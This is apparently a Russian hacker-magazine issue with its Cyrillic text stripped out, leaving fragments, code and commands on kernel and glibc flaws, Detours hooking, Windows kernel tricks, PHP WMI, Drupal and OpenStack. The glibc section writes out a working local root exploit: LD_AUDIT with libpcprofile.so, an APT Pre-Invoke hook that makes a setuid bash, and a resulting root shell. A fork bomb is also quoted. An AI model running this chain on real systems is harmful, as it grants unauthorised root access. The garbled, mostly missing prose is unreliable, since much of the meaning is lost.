2.6.26 RDS.
,
rds ( ):

. ,
,
. ,
.
.
(CVE-2010-2240) : ,
. ,
, 2.6 ( , 2.4). ,
: ,
. , .
X- (
MIT-SHM) ( , ,
, PDF-).
X-
xorg-large-memory-attacks.pdf
www.invisiblethingslab.com.
SELinux, chroot.
X-
MIT-SHM, xorg.conf:

# echo "blacklist rds" > \
/etc/modprobe.d/blacklist-rds.conf


, ,
. 2007
32- 64- .
root. Ben ,
. ,
2010 ,
. , 2008 -
,
,
. , , 2008-2010,
. .
PoC, ,
: sota.gen.nz/compat2/robert_you_suck.c.
seclists.org PoC,
Ac1db1tch3z: seclists.org/fulldisclosure/2010/Sep/att-268/
ABftw_c.bin. PoC
, Ac1db1tch3z .
, , . Ksplice ,
,

$ cat /etc/X11/xorg.conf
Section "Extensions"
Option "MIT-SHM" "disable"
EndSection

INFO

suid-

,

.

HTTP://WWW
grsecurity.net

grsecurity;
www.gentoo.
org/proj/en/hardened/ Gentoo
,

grsecurity
;
www.openwall.
com/Owl/
,

.


2.6.32.19, 2.6.34.4 2.6.35.2. , 2004 SUSE
, -
. SLED openSUSE
. ,
. ,
DoS-.
: lkml.org/


grsecurity
lkml/2010/11/25/8.
100% ,
. . - ,
. , , BSD-, FreeBSD 8.1 OpenBSD 4.8.
- (,
:(){ :|:& };:), :
- ulimit
( -);
. root. kill -KILL.
.
,
. .

System

, -
. , , ldd. ,
. , ,
. ldd :
# ldd /bin/ping
linux-vdso.so.1 => (0x00007fff69b7e000)
libc.so.6 => /lib/libc.so.6 (0x00007fd0cce9f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd0cd243000)

, ldd bash-,
LD_TRACE_LOADED_OBJECTS=1,
. ld-linux.so,
, . , ,
. , ldd
:
# LD_TRACE_LOADED_OBJECTS=1 /bin/ping
linux-vdso.so.1 => (0x00007fff232da000)
libc.so.6 => /lib/libc.so.6 (0x00007f1bf7363000)
/lib64/ld-linux-x86-64.so.2 (0x00007f1bf76e6000)

,
libc, ld-linux.so , . ,
- ldd exploit,
exploit. ,
: , .
ldd exploit ( root,


App                           Vuln.
Google Chrome                 76
Safari                        60
Microsoft Office              57
Adobe Acrobat                 54
Mozilla Firefox               51
Sun/Oracle JDK                36
Adobe Shockwave Player        35
Microsoft Internet Explorer   32
RealNetworks RealPlayer       14
Apple WebKit
Adobe Flash Player
Apple QuickTime
Opera
(2010, Bit9)
). , ldd, , -
. ,
: ,
, , .
glibc,
, ldd. (CVE-2010-3847)
root.
, glibc
ELF.
, suid-, , , - suid.
(
). , glibc
, , . Fedora ( RHEL/CentOS),
. Debian Ubuntu
- eglibc.

, , (, /home /tmp), nosuid. glibc ,
: CVE-2010-3856.
, ,
. ( LD_AUDIT)
suid-. , suid-, , ,
suid-, :
$ ls -l /bin/ping
-rwsr-xr-x 1 root root 34716 2010-07-28 14:44 /bin/ping


libpcprofile. Debian/Ubuntu libc, RHEL/Fedora libc-utils.
, EUID UID.
$ ls -l /lib/libpcprofile.so
-rw-r--r-- 1 root root 5496 2010-09-11 00:32 /lib/libpcprofile.so

Ubuntu
umask,
666: umask 0. , :
$ LD_AUDIT="libpcprofile.so" \
PCPROFILE_OUTPUT="/etc/apt/apt.conf.d/666exploit" /bin/ping

,
/etc/apt/apt.conf.d, :
$ ls -l /etc/apt/apt.conf.d/666exploit
-rw-rw-rw- 1 root adept 4 2010-12-04 01:03 /etc/apt/apt.conf.d/666exploit

/etc/apt/apt.conf.d/666exploit .
,
. apt.conf.d?
, cron,
vixie-cron
644, BAD FILE
MODE. rc- ,
, .
, , - , :
$ echo "APT::Update::Pre-Invoke { \"cp /bin/bash /tmp/exploit && chmod u+s /tmp/exploit\"; };" > /etc/apt/apt.conf.d/666exploit

apt-get update
/tmp/exploit. , . , , :
$ /tmp/exploit p
exploit-4.1# whoami
root

RedHat (
glibc), , suid- . suid-
,
capabilities.
Fedora 15.

,
, . .
, -, ,
.
: , avahi-daemon
. , ,
. ,
IPv6 , ( IPv6

).
(, , etc).
-,
: mail , RSS (,
securityfocus.com) .
-, . ( , ,
, highload production- ).
Debian ( )
unattended-upgrades.
Fedora/CentOS yum-updatesd yum-cron.
, , .
, / SELinux AppArmor

,
- .
: , , grsecurity.
grsecurity PaX, , : ,
readonly.
.
PaX, grsecurity :
(RBAC);
chroot
, ,
chroot;
,
, root
;
/proc
dmesg netstat ;
:
,
.

. :
PaX ( );
,
;
/proc,
(,
grsecurity);
;
, 32-
64-.
.
Roadmap KernelHardening https://wiki.ubuntu.com.
,
.


CODING
RankoR ax-soft.ru

Microsoft Detours

, , API-
? , ?
-
Microsoft? ,
. Microsoft
Detours!
WTF?

Microsoft Detours ,
Microsoft Research (,
), Win32
API-. 64 , .. 10 :). ,
( 64-) ,
(-, , )
. , ,
,
( , - ).
Detours research.microsoft.com.
Program Files\Microsoft Research.
, ,
. VC++
make, , . [,
, .
.]. ! , 2008-
, . , . , Microsoft
, .
, detours . ,


2005- ,
, ! , Visual C++ 2005 (
express). 2010- , - ,
Visual C++ 2005/2008 (,
).
detours detours.h,
detoured.lib, detours.lib detoured.dll.
SOCKS4
, Microsoft Detours,
.

, [, !
..] DLL, cool_call(), ,
,
API-, jump
. ,
, , ,
connect(), , Go To Disassembly, :

INFO


HabraHabr.Ru
bobermaniac.

WARNING



API-
00411573  call  dword ptr [__imp__connect@12 (4183B0h)]

F10 , F11
:
71A94A07  mov   edi,edi
71A94A09  push  ebp

, mov edi, edi? , , NOP,


, . -
jump .
, Detours. ?
71A94A07  jmp   @ILT+715(_my_connect@12) (100112D0h)

-, NOP jump
connect() =).

,
.
DetourCreateProcessWithDll(), 7
- , , WinAPI
NULL.
LPCTSTR lpApplicationName
;

BOOL bInheritHandles
launchera , false;
DWORD dwCreationFlags .
,
CREATE_DEFAULT_ERROR_MODE | CREATE_SUSPENDED;
LPSTARTUPINFOW lpStartupInfo ,
;
LPPROCESS_INFORMATION lpProcessInformation , ;
LPCSTR lpDetouredDllPath detoured.dll;
LPCSTR lpDllName DLL-;
:
bool res = DetourCreateProcessWithDll(
L"F:\\DetoursTest\\Debug\\DetoursTest.exe",
NULL, NULL, NULL, false, dwFlags, NULL, NULL,
&si, &pi, detouredName, dllName, NULL);

, ! ( ) ResumeThread, pi.hThread. , , .

DLL.
connect().
DLL.


,
:
int (WINAPI * real_connect) (SOCKET sock, const
sockaddr *addr, int namelen) = connect;

,
. ,
, !
,
:).
, ?
connect(), , ,
SOCKS-, ,
, . ,
SOCKS-, SOCKS , .
:
DLLEXPORT int WINAPI my_connect(
SOCKET sock, const sockaddr *addr, int namelen)
{
return connectToSocks4(real_connect, real_send,
real_recv, "68.102.100.62", 55465,
(struct sockaddr_in *) addr);
}

connectToSocks4() ,
SOCKS-. ,
send() recv(), .
connect().

, , ( ,
). :
DetourRestoreAfterWith()
;
DetourTransactionBegin() / ;
DetourUpdateThread() /
;
DetourAttach:
DetourAttach(&(PVOID&)real_connect, my_connect);

DetourTransactionCommit().
, , , DetourAttach() DetourDetach().
SOCKS4.
SOCKS-
. :
1 SOCKS, 0x04;
1 ( 0x01,
0x02);
2 ( ,
);
4 IP-, ;
N+1 C- N,
, . N
.
, ,
:


1 , ;
1 :
0x5a ,
0x5b fail,
0x5c identd,
0x5d identd .
2 ;
4 .
:
:
0x04 | 0x01 | 0x00 0x50 | 0x42 0x66 0x07 0x63 | 0x00
:
0x00 | 0x5a | 0xXX 0xXX | 0xXX 0xXX 0xXX 0xXX
0xXX (
)

SOCKS-, , .
SOCKS-:
/* ... */
char reply[8];
char packet[9];
/* SOCKS4 CONNECT request: VN=4, CD=1, DSTPORT (2 bytes, network
   byte order), DSTIP (4 bytes), empty USERID, terminating NUL.
   sin_port is already in network byte order, so convert it with
   ntohs() before splitting into high and low bytes: plain division
   on a little-endian host would swap the two port bytes. */
u_short port = ntohs(r_host->sin_port);
packet[0] = 0x04;
packet[1] = 0x01;
packet[2] = (char)(port >> 8);
packet[3] = (char)(port & 0xff);
packet[4] = r_host->sin_addr.S_un.S_un_b.s_b1;
packet[5] = r_host->sin_addr.S_un.S_un_b.s_b2;
packet[6] = r_host->sin_addr.S_un.S_un_b.s_b3;
packet[7] = r_host->sin_addr.S_un.S_un_b.s_b4;
packet[8] = 0x00;
r_send(sock, packet, sizeof packet, 0);
/* the reply is exactly 8 bytes; reading 9 would overrun reply[] */
memset(reply, 0x00, sizeof reply);
int recvd = r_recv(sock, reply, sizeof reply, 0);
/* ... */
return sock;

-
connect(),
.
,
.

, API-
, , ,
Microsoft. ,
SOCKS5? ( ,
, ).
, , , , . ,
:).
,
.
, .

>> coding

CODING
stannic.man@gmail.com


WINDOWS

, .
, IDA Pro
, Windows aka WRK,

Windows. , ?

IT-
ring3 ring0 Windows? ! ,
,
, , CreateFile().
. ,
proof of concept ,
,
, (ring3) . -, , , . ,
, ,
/ ( :)) .

(ring3) (
). , ,
- ?
, 0-day , . ,
nt!ZwSystemDebugControl Windows. ,
,
ring3-
ring0-. ,
.
iret sysexit.
,
( ring0 usermod ).


, ,
KiServiceExit,
,
Windows :).
WRK .
,
KiExceptionExit Kei386EoiHelper !
KiExceptionExit: .

.

APC ,
APC.
Kei386EoiHelper: (
EXIT_INTERRUPT). APC EXIT_ALL .
, ,
.

,
? , , WRK
, KiExceptionExit Kei386EoiHelper
. , ,
,
EXIT_ALL :

NtQueryIntervalProfile

HTTP://WWW

MSDN ,


,


.


, .
, , . ( nt!KiServiceExit) .
,
.
, , ,
. ,
,
.
,
ring0-ring3 ( , , ) . ,
,
, ring0-ring3,
.
,
iret/
sysexit, .
:
KiSystemCallExit;
KiSystemCallExit2;
KiServiceExit;
KiServiceExit2;
KiGetTickCount;
Kei386EoiHelper;
KiTrap02, KiTrap06, KiTrap0D;
KiCallbackReturn;

KiServiceExit:
EXIT_ALL
NoRestoreSegs,
NoRestoreVolatile
Kei386EoiHelper:
EXIT_ALL
,,NoPreviousMode/

: ,
KiExceptionExit KiServiceExit,
. \base\
ntos\ke\i386\trap.asm WRK.
EXIT_ALL,
:
NoRestoreSegs, NoRestoreVolatile NoPreviousMode.
NoRestoreSegs ,
DS, ES, GS. NoRestoreVolatile
, , NoPreviousMode
,
PreviousMode ( -)
KTHREAD.
, ? .

(NoRestoreSegs NoRestoreVolatile), , .
,
/
.
,
.

IOCTLFuzzer Esagelab
NoPreviousMode.
PreviousMode,
. : ,
(,
nt!KiSystemService) : .
.
, Zw*-
,
. SYSENTER/SYSCALL ( INT0xE,
Windows 7) .
, ,
, KiSystemService.
.text:00405FCC ; NTSTATUS __stdcall ZwOpenFile@24
.text:00405FCC     mov     eax, 74h
.text:00405FD1     lea     edx, [esp+0x4]
.text:00405FD5     pushf
.text:00405FD6     push    8
.text:00405FD8     call    KiSystemService
.text:00405FDD     retn    18h
.text:00405FDD _ZwOpenFile@24 endp

- PreviousMode

.
PreviousMode UserMode,
,
. Microsoft
, .

Kei386EoiHelper ,
.
,
EBP ESP. , ESP (
, ),
EBP.
,

RET .
, EBP ESP: MOV EBP, ESP.
:
-, ,

nt!Kei386EoiHelper,
(, ).
EBP, nt!Kei386EoiHelper

. :).

Pro & cons

,
, , . -
(, ,
) .
, , -
. ,
. , ,
, ,
. .
Windows,
,
. , ?
Windows
.

.
. ,
, , .
, , , . , IT-, , .
!


CODING
victorguzy victorguzy@gmail.com

PHP

PHP+WMI

,
.
, ,
, .

RDP .
, ,
(,
,
?).

TCP
. web-,
, , .
, ,
SSL.

web- ( web-) PHP


5.2 (www.denwer.ru).


web- ,

.

.
web- A,
(- BIOS ). www,
, (php-)
. WWW
.htaccess .htpasswd (
.htaccess):
<Files .htpasswd>
deny from all
</Files>
AuthType Basic
AuthName "Private zone. Only for Administrators!"
AuthUserFile a:\home\localhost\www\.htpasswd
require valid-user

BIOS ( )
()
.
.htpasswd ( htpasswd.
exe WEB- Apache),
:
wmimin:$apr1$gg1.....$Sip0RHtOvEsQzAkg3Y0
wmioper:$apr1$JxT6./..$XWF94oRqOlKXRKsKrU0


, .
IP-, ,
,
dyndns.com (
, DNS),
(, DLink
ADSL )
(. ).
web-
IP- DMZ-.

,
.
PHP WMI
COM.
WMI ( Windows)
:
Dsprov.dll, Active
Directory (Active Directory provider), Active Directory
WMI;
Ntevt.dll, (Event
Log provider),
;
Wbemperf.dll,
(Perfomance Counter provider)
;
Stdprov.dll, (Registry
provider),
;
Snmpincl.dll, SNMP-
(SNMP provider),
SNMP (Simple Network Management Protocol);
Wmiprov.dll,
(WDM provider),
Windows Driver Model (WDM);
Cimwin32.dll, Win32
(Win32 provider),
, , , , ,


, , ,
, , ,
;
Msiprov.dll,
(Windows Installer provider)
.

web-
(, , ),

, ( IP-),

web-.
Win32
.

,
.

BIOS,
( bios.
php). COM-
StdRegProv WMI. $server,

IP-.

$obj = new COM(
'winmgmts:{impersonationLevel=impersonate}//'
.$server.'/root/default:StdRegProv');
$obj->getStringValue(HKLM,$keypath1,
$keyvalue_def,$key);
echo "BIOS release date: ".$key."\r\n";
$obj->getStringValue(HKLM, $keypath2,
$keyvalue_mb_model, $key);
echo "Mainboard model: ".$key ."\r\n";

, COM-
getStringValue HKLM
( ,
define('HKLM',0x80000002);).
:

HTTP://WWW

.

PHP5.


dynamic dns
( cpu_info.php),
:
/root/cimv2
Win32_Processor
$obj = new COM (
'winmgmts:{impersonationLevel=impersonate}//'
.$server.'/root/cimv2');
$pc = 0;

CPU ( )
Const HKEY_CLASSES_ROOT   = 0x80000000
Const HKEY_CURRENT_USER   = 0x80000001
Const HKEY_LOCAL_MACHINE  = 0x80000002
Const HKEY_USERS          = 0x80000003
Const HKEY_CURRENT_CONFIG = 0x80000005

(
):
BIOS release date: 04/30/10
Mainboard manufacturer: Gigabyte Technology Co., Ltd.
Mainboard model: G31M-ES2L

getStringValue StdRegProv, :
GetBinaryValue BINARY;
GetDWORDValue DWORD;
GetExpandedStringValue
EXPANDED STRING;
GetMultiStringValue MULTI
STRING;
CreateKey ;
SetBinaryValue BINARY;
SetDWORDValue DWORD;
SetExpandedStringValue
EXPANDED STRING; SetMultiStringValue
MULTI STRING;
SetStringValue ;
DeleteKey ;
DeleteValue ;
EnumKey ;
EnumValues ;
CheckAccess .

, MSDN.


WMI (/root/cimv2),
Win32_
Processor, Win32_OperatingSystem, Win32_PerfFormattedData_
PerfOS_System, Win32_OperatingSystem, Win32_Process, Win32_
Service. ,
(CPU), CPUID


foreach ($obj->instancesof('Win32_Processor') as $mp)
{
    echo "Processor (".++$pc.")\r\n";
    echo "Name: ".trim( $mp->Name )." @ " .
        $mp->CurrentClockSpeed . " MHz\r\n";
    echo "CPU Load: ".$mp->LoadPercentage . "%\r\n";
}

COM- , Win32_Processor, :
Processor (1)
Processor Id: BFEBFBFF0001067A
Name: Pentium(R) Dual-Core
CPU E5300 @ 2.60GHz @ 1196 MHz
CPU Load: 18%
CPU Status: OK
CPU Stepping:
CPU Revision: 5898
System Name: GUZY

, /root/WMI MSAcpi_
ThermalZoneTemperature (
cpu_temp.php). CPU
, .
/root/WMI
MSAcpi_ThermalZoneTemperature
$obj = new COM (
'winmgmts:{impersonationLevel=impersonate}//'
.$server.'/root/WMI');
foreach($obj->instancesof (
'MSAcpi_ThermalZoneTemperature') as $mp)
{
echo "<pre>\r\n";
$ctemp=($mp->CurrentTemperature);
// CurrentTemperature is reported in tenths of a kelvin
echo "<b>Current CPU temperature: "
. ($ctemp - 2732)/10 . "C" . "\r\n";
}

.

/root/cimv2 ,
- . , uptime.php. Win32_OperatingSystem Win32_

foreach ( $process AS $row )
{
    echo "<pre>\r\n";
    echo "NAME: " . $row->Name .",
    \r\nDISPLAY NAME:".strtolower($row->DisplayName).",
    \r\nPATH: " . strtolower($row->PathName ). ",
    \r\nSTATE: " . strtolower($row->state )."<br/>";
}


:
PerfFormattedData_PerfOS_System. uptime format_time($temp),
human_second.php.
OS uptime
foreach($obj->instancesof
('Win32_OperatingSystem') as $mp )
{
$temp=($mp->Name);
echo "OS name: " .substr($temp,0,-40). "\r\n";
$temp2=($mp->ServicePackMajorVersion);
echo "Service pack: " . $temp2 . "\r\n";
}
foreach ($obj->instancesof
('Win32_PerfFormattedData_PerfOS_System') as $mp)
{
$temp=($mp->SystemUpTime);
echo "System uptime: ".format_time($temp)."\r\n";
}

:
OS name: Microsoft Windows Server 2008 R2 Enterprise
Service pack: 0
System uptime: 23hour 32min 42sec

, PHP WMI
.
( ,
, DNS , ) include.

/root/cimv2 Reboot
Win32_OperatingSystem.
ShutDown.

$obj = new COM(
'winmgmts:{impersonationLevel=impersonate,(Shutdown)}//'
.$server.'/root/cimv2');
foreach($obj->instancesof
('Win32_OperatingSystem') as $mp)
{
echo "<pre>\r\n";
echo "<b>Rebooting immediately\r\n</b>\r\n</pre>";
$mp->Reboot(); // Reboot is a method of Win32_OperatingSystem, not a property
}

:

$process = $obj->execquery
("SELECT * FROM Win32_Service");


$process = $obj->execquery
("SELECT * FROM Win32_Process");
if ( $process->count > 0 )
{
foreach ( $process AS $row )
{
echo "<pre>\r\n";
echo "PID: ".$row->processid.",
\r\nPROCESS NAME: ".strtolower( $row->name ).",
\r\nMEMORY USAGE: ".number_format
( $row->workingsetsize )."<br/>";
}
}

StartService
StopService Win32_Service:

$process = $obj->execquery
("SELECT * FROM Win32_Service Where
Name='$servicesname'");
foreach ($process AS $row)
{
$row->StartService();
echo "Service started!";
}

Create
win32_process:

$obj_win32_process=new COM(
'winmgmts:{impersonationLevel=impersonate}//'
.$server.'/root/cimv2:Win32_Process');
$obj_win32_process->Create($processname,
Null,Null,lngProcessID2);
echo "Process created!";

, WMI-
PHP, web- ,
, , .
PHP WMI
Windows-.
PTR (pointer) ( dns_ptr.php),
/root/MicrosoftDNS
MicrosoftDNS_PTRType. web- - (.
).
, Windows- c php- , !


SYN/ACK
antonov.igor.khv@gmail.com, http://vr-online.ru

Drupal'

: , . ,
. , , Drupal. ,
,
. ,
. Drupal ,
. ?
Drupal'.

1:
Drupal

Drupal web-,
web-. .
, Drupal
. , ,
, Drupal'
.
Drupal
BrainstormBlogger (brainstormblogger.org) Open Atrium (openatrium.
com). Drupal', . Drupal
,
. Drupal. Rainstorm Blogger

( )
. , , .
, Brainstorm blogger . ,
.
, Open Atrium.
. ,
.
, ,
, .
, ( )
Open Atrium.
, .
, , , .
:
;
;
;
wiki;
.


2: Drupal'

web- Drupal
, .

!
drush (http://drupal.org/project/drush).
drupal'
:
;
/ ;
.
drush
.
.
, Drupal
. ,
,
. , , , ? !
drush. up upc. /
. ,
:
$ ./drush uninstall < >

:
$ ./drush en blog // blog
$ ./drush dis blog // blog

, drush ,
.
? Drush
.

3: OpenID

.
- web-
/

. - , OpenID ,
/
. ,
OpenID.
, Drupal , OpenID. ,
OpenID,
, OpenID.
, ( ) Yandex, Rambler, Google, LiveJournal,
VKontakte, Facebook .
(Google, LiveJournal, Facebook) Drupal , .
OpenID-,
.
! -,
OpenID Extension (http://drupal.org/files/issues/openid_ext_1.zip)
. ,
OpenID.
,
ID- .

4: Drupal +

OpenID, , ,

( ) , ? , External Form Login, .
VKontakteID,
.
, . ,
. OpenID- ( VKontakteID),
. ,
, .
- . ,
, , , . , Drupal
. ,
- .

OpenAPI-. , .
Drupal OpenAPI
VK OpenAPI (http://drupal.org/project/vk_openapi).
,
. VK OpenAPI
Share,
.

5:

PHP Smarty
(www.smarty.net). CMS , . ,
. , Drupal
, smarty. smarty theme engine
Drupal (http://drupal.org/project/smarty) , ,
Smarty ( ). Smarty. , ,
Smarty-,
.

6:
Drupal?

Drupal' . ,
90% : Drupal .
,
. ,

. , .
1. . , (http://drupal.org/documentation/theme).
, . ,
, , Drupal
. -


Drush

( ).

8:

OpenAtrium
,
Drupal-.
Drupal (http://pcmag.ru/solutions/detail.
php?ID=37518). .
2. Zen. Drupal
.
.
Zen (http://drupal.org/project/zen).
.

7: Shared VPS?

Drupal ,
,
. Drupal
,
. , , web-, , PHP .

. , .
, .

, shared-
- .
VPS,


Drupal . Drupal , - ,
. Drupal
:
1. . .

.
2. . Drupal , (, ).
3. .
,
Drupal.
, . (admin/settings/performance)
, . ,
, .
: .
, . .
.
,
.

. CSS JavaScript . ? ,
css/js .

. , , . , .
Drupal css/js,
.

9:

,
Drupal
. web-,
PHP. - ,
.
,
PHP.
Drupal PHP,
.
PHP ,
Drupal php_value memory_
limit. ,
, .
, , .
,
32M (
32- ). ,
max_execution_time
( ).
30 .
,
.
PHP
PHP , ,
.
PHP
,
.
, .
php-
, php-.
-

.
- .
eAccelerator
(http://www.eaccelerator.net).
,
.

web- MySQL. , , .
MySQL
, , ( mysql).

10:

.
Drupal , .
. ,
. Drupal
. ,
cacherouter (http://drupal.org/project/
cacherouter). CR
Drupal
memcached
(APC, eAccelerator, XCache). ,
.

11: Views
- Drupal. sql-.
: , .
,
. Views (http://drupal.org/project/views).
, ,
, . .
, ,
.
.

HTTP://WWW
drupal.org
Drupal:

CMF,
,
;
www.drupal.ru

Drupal:
,
Drupal
. ,
,
,

;
http://contentmanagementsystems.info/

Drupal: ,
FAQ, CMF
Drupal;
vr-online.ru

, .


, Drupal. ,
, .


Drupal

12: Drupal.API

, API SQL
. , ,
. . Drupal.API. , ,
. ,
,
.
, , ,
.

13:

. , ,
, .

. http://loadimpact.
com. web-
. .
pro-. , , ,
, . :
, . , ,
.

14:

, web- Apache. ,
. Apache Drupal

.
, .
, .
? nginx (http://sysoev.ru/nginx)! -


nginx, , web-. Apache


(
, nginx ).
(http://vr-online.ru) Apache nginx. : ,
. Apache .

15: nginx

Nginx Drupal' ,
, .
. ,
. - ,
(https://github.com/yhager/nginx_drupal) nginx,
Drupal. Drupal
nginx. ,
, :
url;
;
fastcgi;
boost .

16: Drupal 7

,
.
( ) -,
.
,
Drupal'.

Drupal CMS,
. , . .
Drupal . ! ,
, , drupal' .
!

SYN/ACK
zobnin@gmail.com

,

cloud- OpenStack:

syn/ack
Eucalyptus, Ubuntu Enterprise Cloud.
,
NASA, Intel, AMD, Dell .
, ,
, ,
, , , .

, ,
.

, ,
.
.
- , .

Amazon EC2,
IaaS (
,
). EC2

,
, .
, Amazon, , , ,
Amazon,
. ,
IaaS ,
, ,
, . , , ,
, , :
,
.
Eucalyptus Open Source , ,
cloud- IaaS
.
, , , ,
Amazon EC2.
, Eucalyptus ,


.
, ,
, .
OpenStack : Cloud Files and Cloud Servers, RockSpace,
Nebula Cloud Platform, NASA.
,
: OpenStack Nova OpenStack Swift.

Nova

OpenStack Nova (Compute), ,


. Nova
:
, ,
, .. Nova NASA
Nebula (http://nebula.nasa.gov/), Python AMQP.
:
(Cloud Controller) ;
API (API Server) web-,
;
(Compute Controller)
;
(Object Store) ,
Amazon S3;
(Auth Manager) ;
(Volume Controller) ;
(Network Controller)
,
;
(Scheduler)
.
,
. API,
, .
nova-manage . , , API


SaaS Software as a Service (
).
, .
: gmail.
PaaS Platform as a Service ( ).

.
Java, .
IaaS Infrastructure as a Service (
). , ,

.
Amazon EC2
euca2ool Eucalyptus.

(Object Store). Nova S3-
,
.
Swift, Nova.
,
( ).
.

,
IP-
,
.
, ,
.
,

, ,
(

, , ).

OpenStack,
.

, , , .
, .

:
,
API. API
,
:
, .
IP-
.
,

.
, ,
,
. , ,

API . ,
,
,

.
, OpenStack .

HTTP.
. , OpenStack
, , .
Amazon
EC2,
( KVM, UML,
XEN, HyperV qemu).

Swift

Swift (OpenStack Object Storage) , , Amazon S3.


Swift
Rackspace.
:
- (Proxy Server),
;
(Object Server),
;
(Container Server), ;
(Account Server), .
Swift-
,
-,
,
( )
.

HTTP://WWW
Nova: http://
nova.openstack.org/
nova.concepts.html;

Nova: http://nova.
openstack.org/
adminguide/index.
htmll;

Nova: http://
wiki.openstack.
org/NovaInstall/
MultipleServer;
Swift: http://
swift.openstack.
org/overview_
architecture.html.

INFO
OpenStack
,

,



.


- ReST-ful API, HTTP.


:
GET http://swift.host.com/v1/account/container/object

account , container , , object


(, , ).
- (rings) .
, , .
, . , .
Swift-. .
, ,
,
(xattr). ,
,
.
, , RAID-.
.
, ,
Swift.
,
(,
), , ,
.

OpenStack , ,
, ,
.
Nova , Swift,
, .
, ,
.
, Nova Swift
,
:


Nova
$ sudo apt-get install rabbitmq-server \
redis-server
$ sudo apt-get install nova-api \
nova-objectstore nova-compute \
nova-scheduler nova-network \
euca2ools unzip

, :
$ sudo nova-manage user admin vasya

,
:
$ sudo nova-manage project create \
experiments vasya

, , zip-:
$ sudo nova-manage project zipfile \
experiments vasya

,
EC2- . , novarc:

$ unzip nova.zip
$ . novarc

, EC2- .
Linux- Rackspace:
$ wget http://c2477062.cdn.cloudfiles.rackspacecloud.com/images.tgz

:
$ tar -xzf images.tgz

, :

1. :
$ euca-bundle-image -i images/aki-lucid/image \
-p kernel --kernel true
$ euca-bundle-image -i images/ari-lucid/image \
-p ramdisk --ramdisk true

2. :
$ euca-upload-bundle -m /tmp/kernel.manifest.xml -b mybucket
$ euca-upload-bundle -m /tmp/ramdisk.manifest.xml -b mybucket

3. :
$ euca-register mybucket/kernel.manifest.xml
$ euca-register mybucket/ramdisk.manifest.xml

. .

4. , :
$ euca-bundle-image -i images/ami-tiny/image -p machine \
--kernel <kernel ID> --ramdisk <ramdisk ID>

5. :
$ euca-upload-bundle -m /tmp/machine.manifest.xml -b mybucket

6. :
$ euca-register mybucket/machine.manifest.xml

, SSH- :
$ euca-add-keypair mykey > mykey.priv
$ chmod 600 mykey.priv

, :
$ euca-run-instances <machine image ID> --kernel <kernel ID> \
--ramdisk <ramdisk ID> -k mykey

:
$ euca-describe-instances

, :
$ virsh list

SSH:
$ euca-authorize -P tcp -p 22 default
$ ssh -i mykey.priv root@10.0.0.3

:
$ euca-terminate-instances <instance ID>


OpenStack. ,
. ,
, , ,

.


SYN/ACK
, InfoWatch fnn@fnn.ru, infowatch.livejournal.com

,

, . .
, (
, 2, 17). :
, , (, 1, 71).
,
. . ,
.
,
. , .
;

;
, ;
;
;
(c) Copyright All rights reserved ;
;
(-) .
,

: ? !.
.

(, )

/
, . . . 1252
: , ,
... .
, ,
.
,


. , , , ( ).
,
.
, , ,
, .
, . ,

14 26 2007 . .


.
:
; -
, .

, . , , , ,
,
? , .
,
. . , , ,
.
. .

.
:
-, ?.

, ,
, .
,
, .

. (. 272 )
,
. ,
, ,
.
,
.
. , , - ,
( )
. , ,
,
.
: , ,
.
. .

.
, ,
. .
, , . XXI
,
.


. -
, ,
.
, .
, , .
. ,
.
,
,
. ,
, .
-.
.
, . , .
,
. ,
, . ,
0,8% (
),
. . ,
. ,
. .
,
. , ,
.
,
. ,


.
. , ,
- . .

(. 72 ) (. 70 )
.
(
) - . ,
, : , .
(, ).
,
.
, , ,
. ( , , ,
) .
, ( ). , , ,
, ( ), ,
.

. ,
, , . .
, . ,
, NC
:
,
( , ).
? .
.
. , ,

.
.
.
. , -
.
. : , . ,
.

(c) Copyright All rights


reserved

, , . ,
, , .
,
. - ,
, :
,
.
, .



- (. 4 . 1259).
copyright () : . 1271 ,
- .

GPL, BSD, GFDL , . ,


, , . , .
( ) .
, , .

.

.
, , . ,
: , , ,
, . , ,
,
. , , . ,
.
, , , , (. 130 ) ,
,
. ,

, ,
IP-, . ,
.


. . ,
, ,
.
, , , , .
.

, , . -,
, . ,
: lozovsky@gameland.ru. ,
FAQ, .
. .

SYN/ACK
Group-IB, pisemskiy@group-ib.ru


-


.
400 , GroupIB 2010 .
, , .
, ,
.

- -,
.
, : , .
2008 .

, ,
. 2010
76 , 46
. 35
, .

,
,
, .
, ,
, .

: , , .
.
1. .
, ,

, .
(/ )
. Zeus,
.
, -,
iframe- Java-, (Adobe


Flash, Adobe Reader, Java ).


,
, . ,
, .

,
.
,
, . - :
/, ,
(, , ).
2.
, .
,
. IP-,
.
( , ,
, ) - IP-

IP-, .

. .

, RDP, VNC, Radmin, TeamViewer.

,
.
Windows,
.
VPN- OpenVPN Hamachi.
.
,

- , API Windows.
, , ,
.
, ,
.
:
, , DDoS-
- .
(, NT Loader). ,
, .
3.

, .
.

, ,
. ( 2 )
,
,
. :
.

, ,
.
,
, .

IP-
.
,
.
,

:
, ,
, .
, ,
. , 80%

.
,
- -,
.
, .
IP-
: , 1,
, .

.
,
.
,
. ,
,
,
.

.
4
80% .
:
, ( , ,
);
, ;
;
;
DDoS- -;
;


IP-
.

. ,
,
. -,
, .

,
,
.
,
. -

.
.
.
, , , ,
.
.


1. , .
2. .
3. .
4. :
;
;
;
5.

.
.
.

.
6. . .
7.
, .



. ,
. . ,
2 ,
.



Win32/Spy.Shiz.NAL
;
Terminal Services (RDP);
OpenSSL;
Windows ;
;
;
Crypto API.
:
BS-Client;
iBank;
--/ Faktura;
;
WebMoney;
HandyBank;
;
/ InterBank;
Inter-PRO;
;
;
.


UNITS
Ant antitster@gmail.com, Step twitter.com/stepah

faq
united?

faq@real.xakep.ru
Q: ,
,
?
-
.
A:
client-side .
, ,
, .
,

, -
.
:
SurfPatrol (surfpatrol.ru).
(QuickTime, Flash, Adobe Reader,
Silverlight, Java ). -
, SurfPatrol
.
Secunia Online Software Inspector
(secunia.com/vulnerability_scanning/online).

. -
PSI.


Panda ActiveScan 2.0 (pandasecurity.com/


homeusers/solutions/activescan). ActiveX-
Panda Security.
Check Your Plugins (mozilla.com/
plugincheck). - Firefox'.

Q: ,

SMS-.

, COM :).
A:
Clickatell Bulk SMS Gateway (clickatell.
com). - ,
SMS
( Fake ID).
SMS-
.
API,

.

(clickatell.com/developers/

clickatell_api.php), ,
PHP.
HTTP API Clickatell:
<?php
// Clickatell account name
$user = "user";
// account password
$password = "password";
// API id issued by Clickatell
$api_id = "xxxx";
$baseurl = "http://api.clickatell.com";
// message text
$text = urlencode("Hi! This is alert message. Server is down!");
// recipient number
